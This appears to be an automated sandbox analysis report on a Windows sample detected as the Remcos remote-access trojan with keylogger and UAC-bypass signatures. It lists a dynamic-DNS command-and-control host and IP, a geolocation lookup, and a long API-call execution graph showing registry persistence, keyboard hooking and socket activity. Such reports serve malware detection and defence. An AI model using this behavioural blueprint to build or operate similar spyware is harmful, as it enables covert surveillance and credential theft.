Jan 10, 2025 07:50:16.947993994 CET | 1.1.1.1 | 192.168.2.7 | 0xead8 | No error (0) | juanosorio.loseyourip.com | (none) | 179.15.136.6 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 07:50:18.336433887 CET | 1.1.1.1 | 192.168.2.7 | 0x6180 | No error (0) | geoplugin.net | (none) | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                        • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49706 | 178.237.33.50 | 80 | 7704 | C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:50:18.345216036 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Jan 10, 2025 07:50:18.965486050 CET | 1171 | IN | HTTP/1.1 200 OK
date: Fri, 10 Jan 2025 06:50:18 GMT
server: Apache
content-length: 963
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

Target ID: 1
Start time: 01:50:16
Start date: 10/01/2025
Path: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe"
Imagebase: 0x400000
File size: 493'568 bytes
MD5 hash: 90BF80022402E68248981833DCFACDE0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.3753688291.000000000228F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false


Execution Graph

Execution Coverage: 4.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 22.3%
Total number of Nodes: 1351
Total number of Limit Nodes: 62
47390 402e78 46990->47390 46992 404cee 46992->46658 47399 404bc4 46993->47399 46995 405cf4 46995->46661 46997 401efe 46996->46997 46999 401f0a 46997->46999 47408 4021b9 26 API calls 46997->47408 46999->46665 47002 4021b9 47000->47002 47001 4021e8 47001->46667 47002->47001 47409 40262e 26 API calls _Deallocate 47002->47409 47006 401ec9 47004->47006 47005 401ee4 47005->46675 47006->47005 47007 402325 28 API calls 47006->47007 47007->47005 47410 401e8f 47008->47410 47010 40bee1 CreateMutexA GetLastError 47010->46691 47412 41b366 47011->47412 47013 41a67c 47416 4125eb RegOpenKeyExA 47013->47416 47016 401eef 26 API calls 47017 41a6aa 47016->47017 47018 401eea 26 API calls 47017->47018 47020 41a6b2 47018->47020 47019 41a705 47019->46696 47020->47019 47021 4125eb 31 API calls 47020->47021 47022 41a6d8 47021->47022 47023 41a6e3 StrToIntA 47022->47023 47024 41a6f1 47023->47024 47025 41a6fa 47023->47025 47421 41c30d 28 API calls 47024->47421 47026 401eea 26 API calls 47025->47026 47026->47019 47029 40698f 47028->47029 47030 41258f 3 API calls 47029->47030 47031 406996 47030->47031 47031->46707 47031->46708 47033 41b027 47032->47033 47422 40b027 47033->47422 47035 41b02f 47035->46722 47037 401e27 47036->47037 47039 401e33 47037->47039 47431 402121 26 API calls 47037->47431 47039->46725 47042 402121 47040->47042 47041 402150 47041->46728 47042->47041 47432 402718 26 API calls _Deallocate 47042->47432 47045 412998 47044->47045 47046 406052 28 API calls 47045->47046 47047 4129ad 47046->47047 47048 401fbd 28 API calls 47047->47048 47049 4129bd 47048->47049 47050 4127aa 29 API calls 47049->47050 47051 4129c7 47050->47051 47052 401eea 26 API calls 47051->47052 47053 4129d4 47052->47053 47053->46774 47055 401f6e 47054->47055 47433 402301 47055->47433 47059 4127fa 47058->47059 47062 4127c3 47058->47062 47060 401eea 26 API calls 47059->47060 47061 40de0e 47060->47061 47061->46775 47063 4127d5 RegSetValueExA RegCloseKey 47062->47063 47063->47059 47065 43a810 _strftime 47064->47065 
47437 439b4e 47065->47437 47069 41a942 47068->47069 47070 41a8a7 GetLocalTime 47068->47070 47072 401eea 26 API calls 47069->47072 47071 404cbf 28 API calls 47070->47071 47073 41a8e9 47071->47073 47074 41a94a 47072->47074 47075 405ce6 28 API calls 47073->47075 47076 401eea 26 API calls 47074->47076 47077 41a8f5 47075->47077 47078 40de7d 47076->47078 47471 4027cb 47077->47471 47078->46799 47080 41a901 47081 405ce6 28 API calls 47080->47081 47082 41a90d 47081->47082 47474 406478 76 API calls 47082->47474 47084 41a91b 47085 401eea 26 API calls 47084->47085 47086 41a927 47085->47086 47087 401eea 26 API calls 47086->47087 47088 41a930 47087->47088 47089 401eea 26 API calls 47088->47089 47090 41a939 47089->47090 47091 401eea 26 API calls 47090->47091 47091->47069 47093 409536 _wcslen 47092->47093 47094 409541 47093->47094 47095 409558 47093->47095 47096 40c89e 32 API calls 47094->47096 47097 40c89e 32 API calls 47095->47097 47099 409549 47096->47099 47098 409560 47097->47098 47100 401e18 26 API calls 47098->47100 47101 401e18 26 API calls 47099->47101 47102 40956e 47100->47102 47103 409553 47101->47103 47104 401e13 26 API calls 47102->47104 47106 401e13 26 API calls 47103->47106 47105 409576 47104->47105 47494 40856b 28 API calls 47105->47494 47108 4095ad 47106->47108 47479 409837 47108->47479 47110 409588 47495 4028cf 47110->47495 47113 409593 47114 401e18 26 API calls 47113->47114 47115 40959d 47114->47115 47116 401e13 26 API calls 47115->47116 47116->47103 47674 403b40 47117->47674 47121 41aa08 47122 4028cf 28 API calls 47121->47122 47123 41aa12 47122->47123 47124 401e13 26 API calls 47123->47124 47125 41aa1b 47124->47125 47126 401e13 26 API calls 47125->47126 47127 40e096 47126->47127 47127->46852 47129 412567 RegQueryValueExA RegCloseKey 47128->47129 47130 40e15e 47128->47130 47129->47130 47130->46880 47130->46883 47132 412688 RegQueryValueExW RegCloseKey 47131->47132 47133 4126b5 47131->47133 47132->47133 47134 403b40 28 API calls 47133->47134 47135 40e18d 
47134->47135 47135->46895 47137 412a6a RegDeleteValueW 47136->47137 47138 412a7e 47136->47138 47137->47138 47139 412a7a 47137->47139 47138->46904 47139->46904 47141 40cbc5 47140->47141 47142 412546 3 API calls 47141->47142 47143 40cbcc 47142->47143 47144 40cbeb 47143->47144 47696 401602 47143->47696 47148 40cc37 47144->47148 47146 40cbd9 47699 4128ad RegCreateKeyA 47146->47699 47149 40cc4b 47148->47149 47150 412546 3 API calls 47149->47150 47151 40cc52 47150->47151 47152 40cc81 47151->47152 47153 40cc57 47151->47153 47157 41258f 3 API calls 47152->47157 47154 401602 27 API calls 47153->47154 47155 40cc5e 47154->47155 47716 43eadd 47155->47716 47159 40cc7f 47157->47159 47163 4140ac 47159->47163 47161 40cc6a 47162 4128ad 3 API calls 47161->47162 47162->47159 47164 4140c3 47163->47164 47753 41ac7e 47164->47753 47166 4140ce 47167 401d64 28 API calls 47166->47167 47168 4140e7 47167->47168 47169 43a7f7 _strftime 42 API calls 47168->47169 47170 4140f4 47169->47170 47171 414106 47170->47171 47172 4140f9 Sleep 47170->47172 47173 401f66 28 API calls 47171->47173 47172->47171 47174 414115 47173->47174 47175 401d64 28 API calls 47174->47175 47176 414123 47175->47176 47177 401fbd 28 API calls 47176->47177 47178 41412b 47177->47178 47179 41b1ce 28 API calls 47178->47179 47180 414133 47179->47180 47757 404262 WSAStartup 47180->47757 47182 41413d 47183 401d64 28 API calls 47182->47183 47184 414146 47183->47184 47185 401d64 28 API calls 47184->47185 47216 4141c5 47184->47216 47186 41415f 47185->47186 47189 401d64 28 API calls 47186->47189 47187 401d64 28 API calls 47187->47216 47188 401fbd 28 API calls 47188->47216 47190 414170 47189->47190 47192 401d64 28 API calls 47190->47192 47191 41b1ce 28 API calls 47191->47216 47193 414181 47192->47193 47195 401d64 28 API calls 47193->47195 47194 4085b4 28 API calls 47194->47216 47196 414192 47195->47196 47198 401d64 28 API calls 47196->47198 47197 401eef 26 API calls 47197->47216 47199 4141a3 47198->47199 47200 401d64 28 API calls 
47199->47200 47201 4141b5 47200->47201 47889 404101 87 API calls 47201->47889 47204 41431c WSAGetLastError 47890 41be81 30 API calls 47204->47890 47209 414331 47211 41a891 79 API calls 47209->47211 47214 401d8c 26 API calls 47209->47214 47215 401d64 28 API calls 47209->47215 47209->47216 47217 43a7f7 _strftime 42 API calls 47209->47217 47254 401f66 28 API calls 47209->47254 47255 414cb4 CreateThread 47209->47255 47256 401eea 26 API calls 47209->47256 47257 401e13 26 API calls 47209->47257 47891 404c9e 28 API calls 47209->47891 47893 40a767 84 API calls 47209->47893 47894 4047eb 98 API calls 47209->47894 47211->47209 47213 404cbf 28 API calls 47213->47216 47214->47209 47215->47209 47216->47187 47216->47188 47216->47191 47216->47194 47216->47197 47216->47204 47216->47209 47216->47213 47218 405ce6 28 API calls 47216->47218 47220 4027cb 28 API calls 47216->47220 47221 401f66 28 API calls 47216->47221 47222 41a891 79 API calls 47216->47222 47223 401eea 26 API calls 47216->47223 47226 4082dc 28 API calls 47216->47226 47227 440e5e 26 API calls 47216->47227 47228 412735 3 API calls 47216->47228 47229 4125eb 31 API calls 47216->47229 47230 403b40 28 API calls 47216->47230 47231 41aff9 28 API calls 47216->47231 47233 41b0d3 28 API calls 47216->47233 47235 41af51 28 API calls 47216->47235 47236 401d64 28 API calls 47216->47236 47758 414072 47216->47758 47763 4041f1 47216->47763 47770 404915 47216->47770 47785 40428c connect 47216->47785 47845 41ab78 47216->47845 47848 41375b 47216->47848 47851 40cc9a 47216->47851 47857 40cbf1 47216->47857 47219 414d12 Sleep 47217->47219 47218->47216 47219->47209 47220->47216 47221->47216 47222->47216 47223->47216 47226->47216 47227->47216 47228->47216 47229->47216 47230->47216 47231->47216 47233->47216 47235->47216 47237 4145fa GetTickCount 47236->47237 47238 41af51 28 API calls 47237->47238 47251 414614 47238->47251 47240 41af51 28 API calls 47240->47251 47242 41b0d3 28 API calls 47242->47251 47245 40275c 28 API calls 47245->47251 47246 
405ce6 28 API calls 47246->47251 47247 4027cb 28 API calls 47247->47251 47249 401eea 26 API calls 47249->47251 47250 401e13 26 API calls 47250->47251 47251->47240 47251->47242 47251->47245 47251->47246 47251->47247 47251->47249 47251->47250 47863 41aeab GetLastInputInfo GetTickCount 47251->47863 47864 41ae5d 47251->47864 47869 40e751 GetLocaleInfoA 47251->47869 47872 4027ec 28 API calls 47251->47872 47873 4045d5 47251->47873 47892 404468 60 API calls ctype 47251->47892 47254->47209 47255->47209 48055 41a07f 104 API calls 47255->48055 47256->47209 47257->47209 47258->46652 47259->46662 47262 4085c0 47261->47262 47263 402e78 28 API calls 47262->47263 47264 4085e4 47263->47264 47264->46683 47266 4125e3 47265->47266 47267 4125b9 RegQueryValueExA RegCloseKey 47265->47267 47266->46680 47267->47266 47268->46688 47269->46715 47270->46707 47271->46699 47272->46714 47274 40c8ba 47273->47274 47275 40c8da 47274->47275 47276 40c90f 47274->47276 47280 40c8d0 47274->47280 48056 41a956 29 API calls 47275->48056 47279 41b366 2 API calls 47276->47279 47278 40ca03 GetLongPathNameW 47282 403b40 28 API calls 47278->47282 47283 40c914 47279->47283 47280->47278 47281 40c8e3 47284 401e18 26 API calls 47281->47284 47285 40ca18 47282->47285 47286 40c918 47283->47286 47287 40c96a 47283->47287 47325 40c8ed 47284->47325 47289 403b40 28 API calls 47285->47289 47288 403b40 28 API calls 47286->47288 47290 403b40 28 API calls 47287->47290 47292 40c926 47288->47292 47293 40ca27 47289->47293 47291 40c978 47290->47291 47298 403b40 28 API calls 47291->47298 47299 403b40 28 API calls 47292->47299 48059 40cd0a 28 API calls 47293->48059 47294 401e13 26 API calls 47294->47280 47296 40ca3a 48060 402860 28 API calls 47296->48060 47301 40c98e 47298->47301 47302 40c93c 47299->47302 47300 40ca45 48061 402860 28 API calls 47300->48061 48058 402860 28 API calls 47301->48058 48057 402860 28 API calls 47302->48057 47306 40ca4f 47309 401e13 26 API calls 47306->47309 47307 40c999 47310 401e18 26 API calls 
47307->47310 47308 40c947 47311 401e18 26 API calls 47308->47311 47312 40ca59 47309->47312 47313 40c9a4 47310->47313 47314 40c952 47311->47314 47315 401e13 26 API calls 47312->47315 47316 401e13 26 API calls 47313->47316 47317 401e13 26 API calls 47314->47317 47318 40ca62 47315->47318 47319 40c9ad 47316->47319 47320 40c95b 47317->47320 47321 401e13 26 API calls 47318->47321 47322 401e13 26 API calls 47319->47322 47323 401e13 26 API calls 47320->47323 47324 40ca6b 47321->47324 47322->47325 47323->47325 47326 401e13 26 API calls 47324->47326 47325->47294 47327 40ca74 47326->47327 47328 401e13 26 API calls 47327->47328 47329 40ca7d 47328->47329 47329->46760 47330->46772 47331->46795 47333 41275b RegQueryValueExA RegCloseKey 47332->47333 47334 41277f 47332->47334 47333->47334 47334->46753 47335->46787 47336->46823 47337->46834 47338->46856 47339->46845 47340->46879 47342 401e0c 47341->47342 47343->46706 47346 41a867 LoadResource LockResource SizeofResource 47345->47346 47347 40e25b 47345->47347 47346->47347 47347->46937 47349 401f8e 47348->47349 47355 402325 47349->47355 47351 401fa4 47351->46941 47353 401f86 28 API calls 47352->47353 47354 406066 47353->47354 47354->46948 47356 40232f 47355->47356 47358 40233a 47356->47358 47359 40294a 28 API calls 47356->47359 47358->47351 47359->47358 47361 40250d 47360->47361 47363 40252b 47361->47363 47364 40261a 28 API calls 47361->47364 47363->46952 47364->47363 47370 403c30 47365->47370 47368->46954 47369->46973 47371 403c39 47370->47371 47374 403c59 47371->47374 47375 403c68 47374->47375 47380 4032a4 47375->47380 47377 403c74 47378 402325 28 API calls 47377->47378 47379 403b73 47378->47379 47379->46954 47381 4032b0 47380->47381 47382 4032ad 47380->47382 47385 4032b6 28 API calls 47381->47385 47382->47377 47386->46977 47387->46981 47388->46983 47392 402e85 47390->47392 47391 402ea9 47391->46992 47392->47391 47393 402e98 47392->47393 47395 402eae 47392->47395 47397 403445 28 API calls 47393->47397 47395->47391 47398 40225b 26 
API calls 47395->47398 47397->47391 47398->47391 47400 404bd0 47399->47400 47403 40245c 47400->47403 47402 404be4 47402->46995 47404 402469 47403->47404 47406 402478 47404->47406 47407 402ad3 28 API calls 47404->47407 47406->47402 47407->47406 47408->46999 47409->47001 47411 401e94 47410->47411 47413 41b373 GetCurrentProcess IsWow64Process 47412->47413 47414 41b38e 47412->47414 47413->47414 47415 41b38a 47413->47415 47414->47013 47415->47013 47417 412619 RegQueryValueExA RegCloseKey 47416->47417 47418 412641 47416->47418 47417->47418 47419 401f66 28 API calls 47418->47419 47420 412656 47419->47420 47420->47016 47421->47025 47423 40b02f 47422->47423 47426 40b04b 47423->47426 47425 40b045 47425->47035 47427 40b055 47426->47427 47429 40b060 47427->47429 47430 40b138 28 API calls 47427->47430 47429->47425 47430->47429 47431->47039 47432->47041 47434 40230d 47433->47434 47435 402325 28 API calls 47434->47435 47436 401f80 47435->47436 47436->46764 47455 43a755 47437->47455 47439 439b9b 47464 4394ee 38 API calls 3 library calls 47439->47464 47440 439b60 47440->47439 47441 439b75 47440->47441 47454 40de27 47440->47454 47462 445564 20 API calls _abort 47441->47462 47444 439b7a 47463 43aa37 26 API calls _Deallocate 47444->47463 47447 439ba7 47448 439bd6 47447->47448 47465 43a79a 42 API calls __Tolower 47447->47465 47451 439c42 47448->47451 47466 43a701 26 API calls 2 library calls 47448->47466 47467 43a701 26 API calls 2 library calls 47451->47467 47452 439d09 _strftime 47452->47454 47468 445564 20 API calls _abort 47452->47468 47454->46782 47454->46783 47456 43a75a 47455->47456 47457 43a76d 47455->47457 47469 445564 20 API calls _abort 47456->47469 47457->47440 47459 43a75f 47470 43aa37 26 API calls _Deallocate 47459->47470 47461 43a76a 47461->47440 47462->47444 47463->47454 47464->47447 47465->47447 47466->47451 47467->47452 47468->47454 47469->47459 47470->47461 47475 401e9b 47471->47475 47473 4027d9 47473->47080 47474->47084 47476 401ea7 47475->47476 47477 40245c 28 API 
calls 47476->47477 47478 401eb9 47477->47478 47478->47473 47480 409855 47479->47480 47481 41258f 3 API calls 47480->47481 47482 40985c 47481->47482 47483 409870 47482->47483 47484 40988a 47482->47484 47486 4095cf 47483->47486 47487 409875 47483->47487 47498 4082dc 47484->47498 47486->46818 47489 4082dc 28 API calls 47487->47489 47491 409883 47489->47491 47524 409959 29 API calls 47491->47524 47493 409888 47493->47486 47494->47110 47665 402d8b 47495->47665 47497 4028dd 47497->47113 47499 4082eb 47498->47499 47525 408431 47499->47525 47501 408309 47502 4098a5 47501->47502 47530 40affa 47502->47530 47505 4098f6 47507 401f66 28 API calls 47505->47507 47506 4098ce 47508 401f66 28 API calls 47506->47508 47509 409901 47507->47509 47510 4098d8 47508->47510 47512 401f66 28 API calls 47509->47512 47511 41b013 28 API calls 47510->47511 47513 4098e6 47511->47513 47514 409910 47512->47514 47534 40a876 31 API calls ___crtLCMapStringA 47513->47534 47516 41a891 79 API calls 47514->47516 47518 409915 CreateThread 47516->47518 47517 4098ed 47519 401eea 26 API calls 47517->47519 47520 409930 CreateThread 47518->47520 47521 40993c CreateThread 47518->47521 47540 4099a9 47518->47540 47519->47505 47520->47521 47546 409993 47520->47546 47522 401e13 26 API calls 47521->47522 47543 4099b5 47521->47543 47523 409950 47522->47523 47523->47486 47524->47493 47664 40999f 136 API calls 47524->47664 47526 40843d 47525->47526 47528 40845b 47526->47528 47529 402f0d 28 API calls 47526->47529 47528->47501 47529->47528 47532 40b006 47530->47532 47531 4098c3 47531->47505 47531->47506 47532->47531 47535 403b9e 47532->47535 47534->47517 47536 403ba8 47535->47536 47538 403bb3 47536->47538 47539 403cfd 28 API calls 47536->47539 47538->47531 47539->47538 47549 409e48 47540->47549 47594 40a3f4 47543->47594 47643 4099e4 47546->47643 47550 409e5d Sleep 47549->47550 47569 409d97 47550->47569 47552 4099b2 47553 409e9d CreateDirectoryW 47557 409e6f 47553->47557 47554 409eae GetFileAttributesW 47554->47557 47555 
409ec5 SetFileAttributesW 47555->47557 47556 409f10 47559 409f3f PathFileExistsW 47556->47559 47562 401f86 28 API calls 47556->47562 47563 40a048 SetFileAttributesW 47556->47563 47564 406052 28 API calls 47556->47564 47565 401eef 26 API calls 47556->47565 47567 401eea 26 API calls 47556->47567 47568 401eea 26 API calls 47556->47568 47591 41b825 32 API calls 47556->47591 47592 41b892 CreateFileW SetFilePointer WriteFile CloseHandle 47556->47592 47557->47550 47557->47552 47557->47553 47557->47554 47557->47555 47557->47556 47560 401d64 28 API calls 47557->47560 47582 41b79a 47557->47582 47559->47556 47560->47557 47562->47556 47563->47557 47564->47556 47565->47556 47567->47556 47568->47557 47570 409e44 47569->47570 47574 409dad 47569->47574 47570->47557 47571 409dcc CreateFileW 47572 409dda GetFileSize 47571->47572 47571->47574 47573 409e0f CloseHandle 47572->47573 47572->47574 47573->47574 47574->47571 47574->47573 47575 409e21 47574->47575 47576 409e04 Sleep 47574->47576 47577 409dfd 47574->47577 47575->47570 47579 4082dc 28 API calls 47575->47579 47576->47573 47593 40a7f0 83 API calls 47577->47593 47580 409e3d 47579->47580 47581 4098a5 127 API calls 47580->47581 47581->47570 47583 41b7ad CreateFileW 47582->47583 47585 41b7e6 47583->47585 47586 41b7ea 47583->47586 47585->47557 47587 41b801 WriteFile 47586->47587 47588 41b7f1 SetFilePointer 47586->47588 47589 41b816 CloseHandle 47587->47589 47590 41b814 47587->47590 47588->47587 47588->47589 47589->47585 47590->47589 47591->47556 47592->47556 47593->47576 47596 40a402 47594->47596 47595 4099be 47596->47595 47597 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 47596->47597 47602 41aeab GetLastInputInfo GetTickCount 47596->47602 47603 40a4a2 GetWindowTextW 47596->47603 47605 401e13 26 API calls 47596->47605 47606 40affa 28 API calls 47596->47606 47607 40a5ff 47596->47607 47609 40a569 Sleep 47596->47609 47612 401f66 28 API calls 47596->47612 47613 40a4f1 47596->47613 47617 4028cf 28 API calls 47596->47617 47618 
405ce6 28 API calls 47596->47618 47620 409d58 27 API calls 47596->47620 47621 41b013 28 API calls 47596->47621 47622 401eea 26 API calls 47596->47622 47623 433724 5 API calls __Init_thread_wait 47596->47623 47624 433ab0 29 API calls __onexit 47596->47624 47625 4336da EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 47596->47625 47626 4082a8 28 API calls 47596->47626 47628 40b0dd 28 API calls 47596->47628 47629 40ae58 44 API calls 2 library calls 47596->47629 47630 440e5e 47596->47630 47634 404c9e 28 API calls 47596->47634 47599 40b027 28 API calls 47597->47599 47599->47596 47602->47596 47603->47596 47605->47596 47606->47596 47608 401e13 26 API calls 47607->47608 47608->47595 47609->47596 47612->47596 47613->47596 47616 4082dc 28 API calls 47613->47616 47627 40a876 31 API calls ___crtLCMapStringA 47613->47627 47616->47613 47617->47596 47618->47596 47620->47596 47621->47596 47622->47596 47623->47596 47624->47596 47625->47596 47626->47596 47627->47613 47628->47596 47629->47596 47631 440e6a 47630->47631 47635 440c5a 47631->47635 47634->47596 47636 440c71 47635->47636 47640 440cb2 47636->47640 47641 445564 20 API calls _abort 47636->47641 47638 440ca8 47642 43aa37 26 API calls _Deallocate 47638->47642 47640->47596 47641->47638 47642->47640 47644 409a63 GetMessageA 47643->47644 47645 4099ff GetModuleHandleA SetWindowsHookExA 47643->47645 47646 409a75 TranslateMessage DispatchMessageA 47644->47646 47657 40999c 47644->47657 47645->47644 47647 409a1b GetLastError 47645->47647 47646->47644 47646->47657 47658 41af51 47647->47658 47651 409a3e 47652 401f66 28 API calls 47651->47652 47653 409a4d 47652->47653 47654 41a891 79 API calls 47653->47654 47655 409a52 47654->47655 47656 401eea 26 API calls 47655->47656 47656->47657 47659 440e5e 26 API calls 47658->47659 47660 41af72 47659->47660 47661 401f66 28 API calls 47660->47661 47662 409a31 47661->47662 47663 404c9e 28 API calls 47662->47663 47663->47651 47666 402d97 47665->47666 47669 4030f7 47666->47669 47668 402dab 
47668->47497 47670 403101 47669->47670 47672 403115 47670->47672 47673 4036c2 28 API calls 47670->47673 47672->47668 47673->47672 47675 403b48 47674->47675 47681 403b7a 47675->47681 47678 403cbb 47685 403dc2 47678->47685 47680 403cc9 47680->47121 47682 403b86 47681->47682 47683 403b9e 28 API calls 47682->47683 47684 403b5a 47683->47684 47684->47678 47686 403dce 47685->47686 47689 402ffd 47686->47689 47688 403de3 47688->47680 47690 40300e 47689->47690 47691 4032a4 28 API calls 47690->47691 47692 40301a 47691->47692 47694 40302e 47692->47694 47695 4035e8 28 API calls 47692->47695 47694->47688 47695->47694 47702 4397ca 47696->47702 47700 4128ec 47699->47700 47701 4128c5 RegSetValueExA RegCloseKey 47699->47701 47700->47144 47701->47700 47705 43974b 47702->47705 47704 401608 47704->47146 47706 43975a 47705->47706 47707 43976e 47705->47707 47713 445564 20 API calls _abort 47706->47713 47712 43976a __alldvrm 47707->47712 47715 447811 11 API calls 2 library calls 47707->47715 47709 43975f 47714 43aa37 26 API calls _Deallocate 47709->47714 47712->47704 47713->47709 47714->47712 47715->47712 47724 4470cf GetLastError 47716->47724 47718 40cc64 47719 41a659 47718->47719 47750 43eabc 47719->47750 47722 43eabc 38 API calls 47723 41a66a 47722->47723 47723->47161 47725 4470e5 47724->47725 47726 4470f1 47724->47726 47745 447676 11 API calls 2 library calls 47725->47745 47746 448916 20 API calls 3 library calls 47726->47746 47729 4470eb 47729->47726 47731 44713a SetLastError 47729->47731 47730 4470fd 47732 447105 47730->47732 47747 4476cc 11 API calls 2 library calls 47730->47747 47731->47718 47735 446cd5 _free 20 API calls 47732->47735 47734 44711a 47734->47732 47737 447121 47734->47737 47736 44710b 47735->47736 47738 447146 SetLastError 47736->47738 47748 446f41 20 API calls _abort 47737->47748 47749 4455c6 38 API calls _abort 47738->47749 47740 44712c 47742 446cd5 _free 20 API calls 47740->47742 47744 447133 47742->47744 47744->47731 47744->47738 47745->47729 47746->47730 
47747->47734 47748->47740 47751 4470cf _abort 38 API calls 47750->47751 47752 41a65f 47751->47752 47752->47722 47754 41acc4 ctype ___scrt_fastfail 47753->47754 47755 401f66 28 API calls 47754->47755 47756 41ad39 47755->47756 47756->47166 47757->47182 47759 414081 47758->47759 47760 41408b getaddrinfo WSASetLastError 47758->47760 47895 413f0f 35 API calls ___std_exception_copy 47759->47895 47760->47216 47762 414086 47762->47760 47764 404206 socket 47763->47764 47765 4041fd 47763->47765 47767 404220 47764->47767 47768 404224 CreateEventW 47764->47768 47896 404262 WSAStartup 47765->47896 47767->47216 47768->47216 47769 404202 47769->47764 47769->47767 47771 40492a 47770->47771 47772 4049b1 47770->47772 47773 404933 47771->47773 47774 404987 CreateEventA CreateThread 47771->47774 47775 404942 GetLocalTime 47771->47775 47772->47216 47773->47774 47774->47772 47898 404b1d 47774->47898 47776 41af51 28 API calls 47775->47776 47777 40495b 47776->47777 47897 404c9e 28 API calls 47777->47897 47779 404968 47780 401f66 28 API calls 47779->47780 47781 404977 47780->47781 47782 41a891 79 API calls 47781->47782 47783 40497c 47782->47783 47784 401eea 26 API calls 47783->47784 47784->47774 47786 4043e1 47785->47786 47787 4042b3 47785->47787 47788 4043e7 WSAGetLastError 47786->47788 47839 404343 47786->47839 47789 4042e8 47787->47789 47791 404cbf 28 API calls 47787->47791 47787->47839 47790 4043f7 47788->47790 47788->47839 47902 42035c 27 API calls 47789->47902 47792 4042f7 47790->47792 47793 4043fc 47790->47793 47795 4042d4 47791->47795 47798 401f66 28 API calls 47792->47798 47907 41be81 30 API calls 47793->47907 47799 401f66 28 API calls 47795->47799 47797 4042f0 47797->47792 47801 404306 47797->47801 47802 404448 47798->47802 47803 4042e3 47799->47803 47800 40440b 47908 404c9e 28 API calls 47800->47908 47808 404315 47801->47808 47809 40434c 47801->47809 47805 401f66 28 API calls 47802->47805 47806 41a891 79 API calls 47803->47806 47810 404457 47805->47810 47806->47789 47807 404418 
47811 401f66 28 API calls 47807->47811 47812 401f66 28 API calls 47808->47812 47904 42113f 56 API calls 47809->47904 47813 41a891 79 API calls 47810->47813 47815 404427 47811->47815 47816 404324 47812->47816 47813->47839 47818 41a891 79 API calls 47815->47818 47819 401f66 28 API calls 47816->47819 47817 404354 47820 404389 47817->47820 47821 404359 47817->47821 47822 40442c 47818->47822 47823 404333 47819->47823 47906 4204f5 28 API calls 47820->47906 47825 401f66 28 API calls 47821->47825 47826 401eea 26 API calls 47822->47826 47828 41a891 79 API calls 47823->47828 47827 404368 47825->47827 47826->47839 47830 401f66 28 API calls 47827->47830 47831 404338 47828->47831 47829 404391 47832 4043be CreateEventW CreateEventW 47829->47832 47834 401f66 28 API calls 47829->47834 47833 404377 47830->47833 47903 41de20 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47831->47903 47832->47839 47835 41a891 79 API calls 47833->47835 47837 4043a7 47834->47837 47838 40437c 47835->47838 47840 401f66 28 API calls 47837->47840 47905 42079d 54 